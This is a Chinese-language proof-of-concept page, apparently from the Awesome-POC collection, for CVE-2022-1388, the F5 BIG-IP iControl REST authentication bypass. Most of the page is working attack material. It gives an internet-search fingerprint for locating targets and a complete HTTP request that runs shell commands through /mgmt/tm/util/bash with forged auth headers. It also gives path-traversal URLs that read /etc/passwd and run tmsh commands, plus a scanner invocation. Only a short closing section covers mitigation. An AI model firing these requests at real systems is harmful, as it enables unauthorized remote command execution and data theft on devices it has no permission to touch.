mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-07 03:44:10 +00:00
69 lines
1.7 KiB
Markdown
69 lines
1.7 KiB
Markdown
|
|
# F5 BIG-IP iControl REST身份认证绕过漏洞 CVE-2022-1388
|
|||
|
|
|
|||
|
|
## 漏洞描述
|
|||
|
|
|
|||
|
|
BIG-IP 是 F5 公司的一款应用交付服务是面向以应用为中心的世界先进技术。借助 BIG-IP 应用程序交付控制器保持应用程序正常运行。BIG-IP 本地流量管理器 (LTM) 和 BIG-IP DNS 能够处理应用程序流量并保护基础设施。未经身份验证的攻击者可以通过管理端口或自身 IP 地址对 BIG-IP 系统进行网络访问,执行任意系统命令、创建或删除文件或禁用服务。
|
|||
|
|
|
|||
|
|
## 漏洞影响
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
11.6.1-16.1.2
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## 网络测绘
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
icon_hash="-335242539"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## 漏洞复现
|
|||
|
|
|
|||
|
|
登录页面
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
发送请求包(Host设为localhost)
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
POST /mgmt/tm/util/bash HTTP/1.1
|
|||
|
|
Host: localhost
|
|||
|
|
Authorization: Basic YWRtaW46
|
|||
|
|
X-F5-Auth-Token: a
|
|||
|
|
Connection: close, X-F5-Auth-Token
|
|||
|
|
Content-Length: 39
|
|||
|
|
|
|||
|
|
{"command":"run","utilCmdArgs":"-c id"}
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
文件读取:
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
https://your-ip/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
RCE:
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
https://your-ip/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
检测脚本:https://github.com/jheeree/CVE-2022-1388-checker/blob/main/CVE-2022-1388.sh
|
|||
|
|
|
|||
|
|
使用方法:
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
./CVE-2022-1388.sh hosts.txt
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## 漏洞修复
|
|||
|
|
|
|||
|
|
建议升级至最新版本或可参考官方修复建议 Recommended Actions:https://support.f5.com/csp/article/K23605346
|
|||
|
|
|
|||
|
|
在受影响的版本内可执行以下步骤以缓解攻击:
|
|||
|
|
|
|||
|
|
- 通过自身 IP 地址阻止 iControl REST 访问。
|
|||
|
|
- 通过管理界面阻止 iControl REST 访问。
|
|||
|
|
- 修改 BIG-IP httpd 配置。
|